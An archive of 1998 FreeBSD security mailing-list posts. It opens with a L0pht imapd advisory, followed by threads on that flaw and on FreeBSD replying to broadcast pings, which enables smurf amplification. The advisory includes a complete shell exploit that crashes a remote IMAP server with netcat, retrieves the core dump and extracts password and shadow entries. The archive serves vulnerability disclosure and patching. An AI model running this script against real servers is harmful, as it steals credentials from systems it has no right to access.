For Solaris you can set the core dump size via the bourne shell's
built-in ulimit command.

/etc/init.d/inetsvc should contain the line ulimit -c 0 directly above
the line starting off inetd.

---excerpt snip---
ulimit -c 0
/usr/sbin/inetd -s
--- excerpt snip---

Don't forget to kill inetd and re-run the inetsvc script.
Other OS's should check if their bourne shell has a built in ulimit and if not, follow whatever methods are used on their particular system to prevent core dumps or limit their size to 0. You can use the following script to test if you are vulnerable or to check that your fix worked. [note: you will need netcat for the script, netcat available from http://www.avian.org and other fine fast food establishments ] Exploit code: ------cut here------ #!/bin/sh # mudge@l0pht.com # # A quick little tool that shows the dangers of priveledged programs dumping # core. # # Shout outs to a bunch of people - in particular Nettwerk. # Hey Nettwerk where'd ya go? # Programs NC=/usr/local/bin/nc CAT=/bin/cat RM=/bin/rm GREP=/bin/grep TAIL=/bin/tail HEAD=/bin/head MV=/bin/mv TR=/bin/tr STRINGS=/bin/strings FILE=/bin/file CC=/usr/local/bin/gcc # temporary command and storage files CMDS1=nc_commands1 CMDS2=nc_commands2 DECODE64_SRC=b64.c TMPNAM=vunlklyname TMPFILE=tmp.$$ # compiled BASE64 decoding program DECODE64=./b64 # core file - sometimes base64 sometimes actuall dump file CORE=core.$$ if [ $# != 3 ] ; then echo "usage: `basename $0` target username password" exit fi echo echo "[L0pht Heavy Industries - l0pht.com]" echo "`basename $0` - " echo " this is a quick proof of concept tool that causes some imapd" echo " implementations to dump core. Unfortunately the core file " echo " contains the password and shadow password file in it!" echo " .mudge [mudge@l0pht.com]" echo # command line supplied variables TARGET=$1 USER=$2 PASS=$3 # resultant password and shadow files PASSWD=./etc_passwd_$TARGET SHADOW=./etc_shadow_$TARGET # the following logs in in plaintext as opposed through X AUTHENTICATE - # you have been forwarned... # login with $user $pass # create a folder that probably isn't there # select the folder # copy the file to another name # the above will cause IMAP4rev1 to crash via calling dummy_copy # note: there are many other ways to get this thing to crash. 
cat > $CMDS1 << FOEFOE 1 LOGIN $USER $PASS 2 CREATE $TMPNAM 3 SELECT $TMPNAM 4 COPY $TMPNAM $TMPNAM.$$ FOEFOE # login with $user $pass (again in plaintext...) # select the core file # retrieve the core file base64 encoded as per RFC822 # delete the core file # delete the temporary file we created # bye bye cat > $CMDS2 << FOEFOE 1 LOGIN $USER $PASS 2 SELECT core 3 UID FETCH 1 (UID RFC822.SIZE RFC822) 4 DELETE core 5 DELETE $TMPNAM 4 LOGOUT FOEFOE # The following quick little program to decode base64 was yanked in # big chunks from Dave Winer's code sitting on # http://www.scripting.com/midas/base64/source.html # hey, credit where it's due - Dave saved me some time here. # modest changes by: mudge@l0pht.com cat > $DECODE64_SRC << FOEFOE #include #define TRUE 1 #define FALSE 0 void decodefile(FILE *, FILE *); int main(int argc, char *argv[]){ FILE *fin, *fout; if (argc > 3){ printf("Usage: %s \n", argv[0]); exit(1); } switch(argc){ case 3: fin = fopen(argv[1], "r"); fout = fopen(argv[2], "w"); if (!fin || !fout) { perror("fopen"); exit(1); } break; case 2: fin = fopen(argv[1], "r"); fout = stdout; if (!fin) { perror("fopen"); exit(1); } break; case 1: fin = stdin; fout = stdout; break; } decodefile(fin, fout); close(fin); close(fout); exit(0); } void decodefile(FILE *fin, FILE *fout) { short charctr; int breakout; unsigned char ch; unsigned char inbuf[3], outbuf[4]; short bufctr = 0, ignore, eot = 0; while ((ch = fgetc(fin))) { if (feof(fin)){ close(fin); break; } ignore = FALSE; if ((ch >= 'A') && (ch <= 'Z')) ch = ch - 'A'; else if ((ch >= 'a') && (ch <= 'z')) ch = ch - 'a' + 26; else if ((ch >= '0') && (ch <= '9')) ch = ch - '0' + 52; else if (ch == '+') ch = 62; else if (ch == '=') eot = TRUE; else if (ch == '/') ch = 63; else ignore = TRUE; if (!ignore) { charctr = 3; breakout = FALSE; if (eot) { if (bufctr == 0) break; if ((bufctr == 1) || (bufctr == 2)) charctr = 1; else charctr = 2; bufctr = 3; breakout = TRUE; } inbuf[bufctr++] = ch; if (bufctr == 4) { 
bufctr = 0; outbuf[0] = (inbuf[0] << 2) | ((inbuf[1] & 0x30) >> 4); outbuf[1] = ((inbuf[1] & 0x0F) << 4) | ((inbuf[2] & 0x3C) >> 2); outbuf[2] = ((inbuf[2] & 0x03) << 6) | (inbuf[3] & 0x3F); fprintf(fout, "%c%c%c", outbuf[0], outbuf[1], outbuf[2]); } if (breakout) break; } } } FOEFOE $CC -o $DECODE64 $DECODE64_SRC if [ ! -x $DECODE64 ] ; then echo "failed to compile base 64 decoding utility" echo "stop" $RM -f $DECODE64_SRC $DECODE64 exit fi echo "[Starting]" echo "Built base64 decoder..." echo echo "Running imap attack..." $CAT $CMDS1 | $NC -w 10 $TARGET 143 > $TMPFILE grep -i "server crashing" $TMPFILE > /dev/null if [ $? -eq 0 ] ; then echo echo "Forced server to dump core. Reconnecting to grab file and clean up!" $CAT $CMDS2 | $NC -w 10 $TARGET 143 > $CORE $RM -f $CMDS1 $CMDS2 $TMPFILE echo "Stripping trailing c/r from RFC822 base64 encapsulated core file" # interesting... I must've missed the section of rfc 1521 that stated # they'd make this DOS'ish $TR -d '\015' < $CORE > $CORE.2 # strip off ^M's from file $MV -f $CORE.2 $CORE else echo "Failed to crash server... cleaning up" $RM -f $CMDS1 $CMDS2 $TMPFILE $DECODE64 $DECODE64_SRC exit fi echo "Removing imap crap from beginning and end of $CORE" VAR=`grep -n "^$" $CORE | awk -F: '{print $1}'` VAR=`expr $VAR + 1` $TAIL +$VAR $CORE > $TMPFILE VAR=`grep -n "=" $TMPFILE | awk -F: '{print $1}'` $HEAD -$VAR $TMPFILE > $CORE $RM $TMPFILE echo echo "Converting base64 image to binary core file..." 
$DECODE64 $CORE $TMPFILE $MV $TMPFILE $CORE $FILE $CORE $STRINGS - $CORE | $GREP ':x:' > $PASSWD $STRINGS -n 13 - $CORE | $GREP ':' | $GREP -v ' ' | $GREP -v ':x:' > $SHADOW if [ -s $PASSWD ] ; then echo echo "Successfully grabbed some form of password file for $TARGET" echo " results located in $PASSWD" else echo "failed to create $PASSWD" $RM -f $PASSWD fi if [ -s $SHADOW ] ; then echo "Successfully grabbed some form of shadow file for $TARGET" echo " results located in $SHADOW" echo " [note: some manual cleanup of $SHADOW is probably required]" echo else echo "failed to create $SHADOW" echo $RM -f $SHADOW fi $RM -f $DECODE64 $DECODE64_SRC $MV -f $CORE core_${TARGET} echo "[Finished]" ------cut here------ mudge@l0pht.com --------------- For more L0pht (that's L - zero - P - H - T) advisories check out: http://www.l0pht.com/advisories.html --------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue May 26 15:41:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA09407 for freebsd-security-outgoing; Tue, 26 May 1998 15:41:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from access.sanet.ge (access.sanet.ge [208.239.39.51]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA09278 for ; Tue, 26 May 1998 15:40:54 -0700 (PDT) (envelope-from kai@sanet.ge) Received: from localhost (kai@localhost) by access.sanet.ge (8.8.8/8.8.7) with SMTP id CAA21594 for ; Wed, 27 May 1998 02:39:13 +0500 (GET) (envelope-from kai@sanet.ge) X-Authentication-Warning: access.sanet.ge: kai owned process doing -bs Date: Wed, 27 May 1998 02:39:13 +0500 (GET) From: Alexander Kandelaki To: freebsd-security@FreeBSD.ORG Subject: strange from Netstat :( Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Hi 1 Today i run command netstat on my system 
(FreeBSD-2.2.6) and get strange results, please explain to me what it means: was it an attack? Maybe a netstat problem?

With best regards
Alexander

<<
tcp 0 0 access.pop3 internews-custom.1991 TIME_WAIT
tcp 0 0 access.pop3 internews-custom.1990 TIME_WAIT
tcp 0 0 access.pop3 internews-custom.1988 TIME_WAIT
tcp 0 0 access.4987 mx1.boston.juno..smtp ESTABLISHED
tcp 0 0 access.smtp f52.hotmail.com.1213 TIME_WAIT
tcp 0 0 access.4983 206.26.43.3.smtp SYN_SENT
tcp 0 -266200144 access.4982 144.49.1.241.25 CLOSED
tcp 12 -266140352 access.4943 16.245.255.240.25 CLOSED
tcp 66 -266192048 access.4866 144.247.255.240.25 CLOSED
tcp 1 -265850836 catk.biosci.uga..64240 144.5.252.240.37039 CLOSED*
tcp 180236 -265923220 88.2.0.0.* 144.127.255.240.6 CLOSED*
tcp 297 -265765036 access.4991 144.218.252.240.25 CLOSED
tcp 1 -266198016 access.4935 16.221.4.241.25 CLOSED*
tcp 425998 -266192680 access.4863 16.216.0.241.25 CLOSED*
tcp 88 -266201816 access.4877 144.159.252.240.25 CLOSED*
tcp 481 -266190776 access.4756 16.212.0.241.25 CLOSED*
tcp 244 -266083900 12.11.0.0.* mcs241.sqo.dec.c.12 CLOSED*
tcp 146 -266188256 access.4656 144.68.252.240.25 CLOSED
tcp 197 -266142256 0.3.5.241.64752 144.50.11.241.39129 CLOSED*
tcp 488 -266141808 128.193.252.240.241 16.120.255.240.4348 -26594166
tcp 3 -266189776 0.252.11.241.3569 16.150.231.240.37042 CLOSED*
tcp 488 -266141808 128.193.252.240.241 16.120.255.240.4348 -26594166
tcp 3 -266189776 0.252.11.241.3569 16.150.231.240.37042 CLOSED*
tcp 3 -266199064 128.155.252.240.3569 16.247.11.241.6382 -26577270
tcp 0 -265755520 0.247.11.241.3057 16.215.251.240.36961 -26607170
tcp 33 -265704768 128.135.251.240.64752 16.142.253.240.39108 -26600766
tcp 70 -265920776 0.51.1.241.3057 16.3.5.241.38962 CLOSED*
tcp 241 -266197776 access.pop3 144.210.1.241.1988 -26570618

From owner-freebsd-security Tue May 26 17:08:02 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA25850 for freebsd-security-outgoing; Tue, 26 May 1998 17:08:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA25585 for ; Tue, 26 May 1998 17:07:13 -0700 (PDT) (envelope-from root@implode.root.com)
Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id RAA03312; Tue, 26 May 1998 17:07:19 -0700 (PDT)
Message-Id: <199805270007.RAA03312@implode.root.com>
To: James Flemer
cc: freebsd-security@FreeBSD.ORG
Subject: Re: imapd_4.1b.txt
In-reply-to: Your message of "Tue, 26 May 1998 13:49:59 EDT." <199805261749.NAA06996@tiger.acsu.k12.vt.us>
From: David Greenman
Reply-To: dg@root.com
Date: Tue, 26 May 1998 17:07:19 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> It is possible to crash the imapd server in several possible places.
> Due to the lack of handling for the SIGABRT signal and the nature
> of the IMAP protocol in storing folders locally on the server; a core dump
> is produced in the users current directory. This core dump contains the
> password and shadow password files from the system.

In the case of FreeBSD, it could contain the no-password passwd file, but
in order for the encrypted passwords to be in memory, the process would have
to be setuid root, and if that is the case, the system won't generate a core
file.

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project

From owner-freebsd-security Tue May 26 18:53:43 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA12504 for freebsd-security-outgoing; Tue, 26 May 1998 18:53:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA12467 for ; Tue, 26 May 1998 18:53:21 -0700 (PDT) (envelope-from mike@dingo.cdrom.com)
Received: from dingo.cdrom.com (localhost [127.0.0.1]) by dingo.cdrom.com (8.8.8/8.8.5) with ESMTP id RAA02472; Tue, 26 May 1998 17:47:22 -0700 (PDT)
Message-Id: <199805270047.RAA02472@dingo.cdrom.com>
X-Mailer: exmh version 2.0zeta 7/24/97
To: dg@root.com
cc: James Flemer , freebsd-security@FreeBSD.ORG
Subject: Re: imapd_4.1b.txt
In-reply-to: Your message of "Tue, 26 May 1998 17:07:19 PDT." <199805270007.RAA03312@implode.root.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 26 May 1998 17:47:22 -0700
From: Mike Smith
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> > It is possible to crash the imapd server in several possible places.
> > Due to the lack of handling for the SIGABRT signal and the nature
> > of the IMAP protocol in storing folders locally on the server; a core dump
> > is produced in the users current directory. This core dump contains the
> > password and shadow password files from the system.
>
> In the case of FreeBSD, it could contain the no-password passwd file, but
> in order for the encrypted passwords to be in memory, the process would have
> to be setuid root, and if that is the case, the system won't generate a core
> file.

Does imapd not run as root from /etc/inetd.conf? The binary is not
setuid in the package tarball...

--
\\ Sometimes you're ahead,       \\ Mike Smith
\\ sometimes you're behind.      \\ mike@smith.net.au
\\ The race is long, and in the  \\ msmith@freebsd.org
\\ end it's only with yourself.  \\ msmith@cdrom.com

From owner-freebsd-security Tue May 26 19:30:34 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA20451 for freebsd-security-outgoing; Tue, 26 May 1998 19:30:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA20417 for ; Tue, 26 May 1998 19:30:20 -0700 (PDT) (envelope-from root@implode.root.com)
Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id TAA04252; Tue, 26 May 1998 19:30:08 -0700 (PDT)
Message-Id: <199805270230.TAA04252@implode.root.com>
To: Mike Smith
cc: James Flemer , freebsd-security@FreeBSD.ORG
Subject: Re: imapd_4.1b.txt
In-reply-to: Your message of "Tue, 26 May 1998 17:47:22 PDT." <199805270047.RAA02472@dingo.cdrom.com>
From: David Greenman
Reply-To: dg@root.com
Date: Tue, 26 May 1998 19:30:08 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

>> > It is possible to crash the imapd server in several possible places.
>> > Due to the lack of handling for the SIGABRT signal and the nature
>> > of the IMAP protocol in storing folders locally on the server; a core dump
>> > is produced in the users current directory. This core dump contains the
>> > password and shadow password files from the system.
>>
>> In the case of FreeBSD, it could contain the no-password passwd file, but
>> in order for the encrypted passwords to be in memory, the process would have
>> to be setuid root, and if that is the case, the system won't generate a core
>> file.
>
>Does imapd not run as root from /etc/inetd.conf? The binary is not
>setuid in the package tarball...

If it is run as root, then the core file will be owned by root with no
permissions for group or other, so you'd have to be root to read it.

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project

From owner-freebsd-security Tue May 26 19:43:07 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA22348 for freebsd-security-outgoing; Tue, 26 May 1998 19:43:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA22320 for ; Tue, 26 May 1998 19:42:55 -0700 (PDT) (envelope-from mike@dingo.cdrom.com)
Received: from dingo.cdrom.com (localhost [127.0.0.1]) by dingo.cdrom.com (8.8.8/8.8.5) with ESMTP id SAA02758; Tue, 26 May 1998 18:36:45 -0700 (PDT)
Message-Id: <199805270136.SAA02758@dingo.cdrom.com>
X-Mailer: exmh version 2.0zeta 7/24/97
To: dg@root.com
cc: Mike Smith , James Flemer , freebsd-security@FreeBSD.ORG
Subject: Re: imapd_4.1b.txt
In-reply-to: Your message of "Tue, 26 May 1998 19:30:08 PDT." <199805270230.TAA04252@implode.root.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 26 May 1998 18:36:45 -0700
From: Mike Smith
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> >Does imapd not run as root from /etc/inetd.conf? The binary is not
> >setuid in the package tarball...
>
> If it is run as root, then the core file will be owned by root with no
> permissions for group or other, so you'd have to be root to read it.

... and if it changes UID to manipulate your mail folders, it will no
longer drop a core. Ok, it sounds like the door is closed on that one.

Do I feel sorry for Mark Crispin? 8)

--
\\ Sometimes you're ahead,       \\ Mike Smith
\\ sometimes you're behind.      \\ mike@smith.net.au
\\ The race is long, and in the  \\ msmith@freebsd.org
\\ end it's only with yourself.  \\ msmith@cdrom.com

From owner-freebsd-security Tue May 26 20:18:46 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA01191 for freebsd-security-outgoing; Tue, 26 May 1998 20:18:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id UAA01170 for ; Tue, 26 May 1998 20:18:32 -0700 (PDT) (envelope-from sysadmin@mfn.org)
Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Tue, 26 May 1998 22:08:19 -0500
Received: by w3svcs.mfn.org with Microsoft Mail id <01BD88F2.6DDD3A40@w3svcs.mfn.org>; Tue, 26 May 1998 22:05:44 -0500
Message-ID: <01BD88F2.6DDD3A40@w3svcs.mfn.org>
From: "J.A. Terranson"
To: "'FreeBSD Security'"
Subject: Possible DoS opportunity via ping implementation error?
Date: Tue, 26 May 1998 22:05:42 -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

I had a very interesting day today! I found out that FBSD (2.2.5R) machines will
always respond to a broadcasted echo request. For example:

W2>ping 10.1.1.255
PING 10.1.1.255 (10.1.1.255): 56 data bytes
64 bytes from 10.1.1.20: icmp_seq=1 ttl=255 time=4.746 ms
64 bytes from 10.1.1.23: icmp_seq=1 ttl=255 time=45.864 ms (DUP!)

lots of these dups... In fact, 1 dup for every FBSD machine on the subnet
(interestingly, there were no replies from my NT4.0 boxes...)

Since I do not follow the "security" list, please respond directly.

Thanks.

J.A. Terranson
sysadmin@mfn.org

From owner-freebsd-security Tue May 26 20:55:46 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA08789 for freebsd-security-outgoing; Tue, 26 May 1998 20:55:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA08698 for ; Tue, 26 May 1998 20:55:15 -0700 (PDT) (envelope-from dima@burka.rdy.com)
Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id UAA09157; Tue, 26 May 1998 20:54:41 -0700 (PDT)
Message-Id: <199805270354.UAA09157@burka.rdy.com>
Subject: Re: imapd_4.1b.txt
In-Reply-To: <199805270136.SAA02758@dingo.cdrom.com> from Mike Smith at "May 26, 98 06:36:45 pm"
To: mike@smith.net.au (Mike Smith)
Date: Tue, 26 May 1998 20:54:41 -0700 (PDT)
Cc: dg@root.com, mike@smith.net.au, jflemer@tiger.acsu.k12.vt.us, freebsd-security@FreeBSD.ORG
X-Class: Fast
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Mike Smith writes:
> > >Does imapd not run as root from /etc/inetd.conf? The binary is not
> > >setuid in the package tarball...
> >
> > If it is run as root, then the core file will be owned by root with no
> > permissions for group or other, so you'd have to be root to read it.
>
> ... and if it changes UID to manipulate your mail folders, it will no
> longer drop a core. Ok, it sounds like the door is closed on that one.
>
> Do I feel sorry for Mark Crispin? 8)

I don't think it will drop core in any case.
As far as I know all the inetd stuff runs from the daemon class, and
daemon class has coredumpsize 0 by default.
>
> --
> \\  Sometimes you're ahead,       \\  Mike Smith
> \\  sometimes you're behind.      \\  mike@smith.net.au
> \\  The race is long, and in the  \\  msmith@freebsd.org
> \\  end it's only with yourself.  \\  msmith@cdrom.com

-- dima

From owner-freebsd-security Tue May 26 22:36:18 1998
Date: Wed, 27 May 1998 17:37:46 +1200
To: "J.A. Terranson", "'FreeBSD Security'"
From: andrew@squiz.co.nz (Andrew McNaughton)
Subject: Re: Possible DoS opportunity via ping implementation error?

At 3:05 PM 27/5/98, J.A. Terranson wrote:
>I had a very interesting day today!  I found out that FBSD (2.2.5R)
>machines will
>always respond to a broadcasted echo request.  For example:

This contradicts the CERT Advisory below which states that FreeBSD does not
have the problem.

Either the CERT report is wrong, a problem has been introduced since, or
it's specific to the way you've set up your boxes.

I'd like to know which.
>=============================================================================
>CERT* Advisory CA-98.01.smurf
>Original issue date: Jan. 05, 1998
>Last revised: --
>
>Topic: "smurf" IP Denial-of-Service Attacks
>- -----------------------------------------------------------------------------
>
>This advisory is intended primarily for network administrators responsible for
>router configuration and maintenance.
>
>The attack described in this advisory is different from the denial-of-service
>attacks described in CERT advisory CA-97.28.
>
>The CERT Coordination Center has received reports from network service
>providers (NSPs), Internet service providers (ISPs), and other sites of
>continuing denial-of-service attacks involving forged ICMP echo request
>packets (commonly known as "ping" packets) sent to IP broadcast
>addresses. These attacks can result in large amounts of ICMP echo reply
>packets being sent from an intermediary site to a victim, which can cause
>network congestion or outages. These attacks have been referred to as "smurf"
>attacks because the name of one of the exploit programs attackers use to
>execute this attack is called "smurf."

>FreeBSD, Inc.
>=============
>In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp
>echo requests destined to broadcast and multicast addresses by default. This
>behaviour can be changed via the sysctl command via
>mib net.inet.icmp.bmcastecho.
>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Andrew McNaughton               =
++64 4 389 6891                 Any sufficiently advanced   =
andrew@squiz.co.nz              bug is indistinguishable    =
http://www.newsroom.co          from a feature.             =
                                -- Rich Kulawiec            =

From owner-freebsd-security Tue May 26 23:00:03 1998
From: "J.A. Terranson"
To: "'Andrew McNaughton'", "'FreeBSD Security'"
Subject: RE: Possible DoS opportunity via ping implementation error?
Date: Wed, 27 May 1998 00:57:18 -0500

I am running fairly plain-jane FBSD 2.2.5 from FTP.FREEBSD.ORG...

CERT is *wrong*

J.A. Terranson
sysadmin@mfn.org

-----Original Message-----
From: Andrew McNaughton [SMTP:andrew@squiz.co.nz]
Sent: Wednesday, May 27, 1998 12:38 AM
To: J.A. Terranson; 'FreeBSD Security'
Subject: Re: Possible DoS opportunity via ping implementation error?

At 3:05 PM 27/5/98, J.A. Terranson wrote:
>I had a very interesting day today!  I found out that FBSD (2.2.5R)
>machines will
>always respond to a broadcasted echo request.  For example:

This contradicts the CERT Advisory below which states that FreeBSD does not
have the problem.

Either the CERT report is wrong, a problem has been introduced since, or
it's specific to the way you've set up your boxes.

I'd like to know which.
>=============================================================================
>CERT* Advisory CA-98.01.smurf
>Original issue date: Jan. 05, 1998
>Last revised: --
>
>Topic: "smurf" IP Denial-of-Service Attacks
>

From owner-freebsd-security Tue May 26 23:48:19 1998
Date: Wed, 27 May 1998 18:49:45 +1200
To: "J.A. Terranson", "'FreeBSD Security'"
From: andrew@squiz.co.nz (Andrew McNaughton)
Subject: RE: Possible DoS opportunity via ping implementation error?

At 5:57 PM 27/5/98, J.A. Terranson wrote:
>I am running fairly plain-jane FBSD 2.2.5 from FTP.FREEBSD.ORG...
>
>CERT is *wrong*
>
>J.A. Terranson
>sysadmin@mfn.org

Now confirmed here also pinging from my mac, which has the same problem.

CERT and BugTRAQ should be notified.  Not sure if this should wait for a
patch to be issued.

Andrew.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Andrew McNaughton               =
++64 4 389 6891                 Any sufficiently advanced   =
andrew@squiz.co.nz              bug is indistinguishable    =
http://www.newsroom.co          from a feature.             =
                                -- Rich Kulawiec            =

From owner-freebsd-security Wed May 27 00:19:10 1998
From: "J.A. Terranson"
To: "'FreeBSD Security'"
Subject: SMURF in 2.2.5
Date: Wed, 27 May 1998 02:16:31 -0500

I assume you guys have been following the thread...

I will not report this to bugtraq until you guys tell me there's
a patch...

J.A. Terranson
sysadmin@mfn.org

From owner-freebsd-security Wed May 27 00:53:15 1998
From: bag@sinbin.demos.su (Alex G. Bulushev)
Subject: Re: Possible DoS opportunity via ping implementation error?
To: andrew@squiz.co.nz (Andrew McNaughton)
Date: Wed, 27 May 1998 11:48:19 +0400 (MSD)
Cc: sysadmin@mfn.org, freebsd-security@FreeBSD.ORG

> At 3:05 PM 27/5/98, J.A. Terranson wrote:
> >I had a very interesting day today!  I found out that FBSD (2.2.5R)
> >machines will
> >always respond to a broadcasted echo request.  For example:
>
> This contradicts the CERT Advisory below which states that FreeBSD does not
> have the problem.
>
> Either the CERT report is wrong, a problem has been introduced since, or
> it's specific to the way you've set up your boxes.

CERT report is wrong
I checked -current (Apr 23) and found that it responds to broadcast ping,
default net.inet.icmp.bmcastecho=1, but it also responds to broadcast
after sysctl -w net.inet.icmp.bmcastecho=0
the good news is that in both cases it does not respond from aliases :)

Alex.

>
> I'd like to know which.
>
>
> >=============================================================================
> >CERT* Advisory CA-98.01.smurf
> >Original issue date: Jan. 05, 1998
> >Last revised: --
> >
> >Topic: "smurf" IP Denial-of-Service Attacks
> >- -----------------------------------------------------------------------------
> >
> >This advisory is intended primarily for network administrators responsible for
> >router configuration and maintenance.
> >
> >The attack described in this advisory is different from the denial-of-service
> >attacks described in CERT advisory CA-97.28.
> >
> >The CERT Coordination Center has received reports from network service
> >providers (NSPs), Internet service providers (ISPs), and other sites of
> >continuing denial-of-service attacks involving forged ICMP echo request
> >packets (commonly known as "ping" packets) sent to IP broadcast
> >addresses. These attacks can result in large amounts of ICMP echo reply
> >packets being sent from an intermediary site to a victim, which can cause
> >network congestion or outages. These attacks have been referred to as "smurf"
> >attacks because the name of one of the exploit programs attackers use to
> >execute this attack is called "smurf."
> >
> >FreeBSD, Inc.
> >=============
> >In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp
> >echo requests destined to broadcast and multicast addresses by default. This
> >behaviour can be changed via the sysctl command via
> >mib net.inet.icmp.bmcastecho.
> >
>
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
> Andrew McNaughton               =
> ++64 4 389 6891                 Any sufficiently advanced   =
> andrew@squiz.co.nz              bug is indistinguishable    =
> http://www.newsroom.co          from a feature.             =
>                                 -- Rich Kulawiec            =

From owner-freebsd-security Wed May 27 01:50:41 1998
Date: Wed, 27 May 1998 10:50:05 +0200 (MET DST)
From: Bart Smit
To: "J.A. Terranson"
cc: "'FreeBSD Security'"
Subject: Re: SMURF in 2.2.5

On Wed, 27 May 1998, J.A. Terranson wrote:

> I will not report this to bugtraq until you guys tell me there's
> a patch...

Well, sysctl -w net.inet.icmp.bmcastecho=0 does not help, contrary to
what you'd expect from the advisory...

--Bart

From owner-freebsd-security Wed May 27 02:55:18 1998
From: Darren Reed
Subject: Re: possible problem with portmap
To: spork@super-g.com (spork)
Date: Wed, 27 May 1998 19:54:31 +1000 (EST)
Cc: mike@smith.net.au, paul@mu.org, freebsd-security@FreeBSD.ORG

In some mail from spork, sie said:
>
> Did anyone quite understand the "nfs-shell" thread on bugtraq?  It was
> discussed shortly after the portmap DoS thread.  From what I could gather
> you could get an interactive shell via nfs??

Yup.  That program was first written in 1991...there are at least two
variations on it.

It is very useful for doing things like ftp via NFS from an ftp server
that has world exports for read on which you don't have an account and
when you're not root.

Darren

From owner-freebsd-security Wed May 27 03:39:44 1998
From: sthaug@nethelp.no
To: bag@sinbin.demos.su
Cc: andrew@squiz.co.nz, sysadmin@mfn.org, freebsd-security@FreeBSD.ORG
Subject: Re: Possible DoS opportunity via ping implementation error?
Date: Wed, 27 May 1998 12:39:30 +0200

> > >I had a very interesting day today!  I found out that FBSD (2.2.5R)
> > >machines will
> > >always respond to a broadcasted echo request.  For example:
> >
> > This contradicts the CERT Advisory below which states that FreeBSD does not
> > have the problem.
> >
> > Either the CERT report is wrong, a problem has been introduced since, or
> > it's specific to the way you've set up your boxes.
>
> CERT report is wrong
> I checked -current (Apr 23) and found that it responds to broadcast ping,
> default net.inet.icmp.bmcastecho=1, but it also responds to broadcast
> after sysctl -w net.inet.icmp.bmcastecho=0
> the good news is that in both cases it does not respond from aliases :)

The problematic code is the following, from the icmp_input() routine in
sys/netinet/ip_icmp.c:

        case ICMP_ECHO:
                if (!icmpbmcastecho
                    && (m->m_flags & (M_MCAST | M_BCAST)) != 0
                    && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) {
                        icmpstat.icps_bmcastecho++;
                        break;
                }
                icp->icmp_type = ICMP_ECHOREPLY;
                goto reflect;

The icmpbmcastecho variable is set according to net.inet.icmp.bmcastecho.
I guess setting net.inet.icmp.bmcastecho=0 is *meant* to turn off both
multicast and broadcast echo, however, this line

                    && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) {

only tests on whether the destination address is a multicast address
(ie. class D), when in reality it also needs to test whether it's one of
the acceptable broadcast addresses for this host (ie. all ones, for every
interface: all ones in host part, all zeros in host part, etc). Such a
test is done by the in_broadcast() routine in sys/netinet/in.c.

I found it just as logical to simply remove the whole test, but I'll let
somebody else decide on whether this is the correct fix. I also changed
the initialization of the icmpbmcastecho variable, so it now defaults to
off (no multicast/broadcast echo). The following patch is against
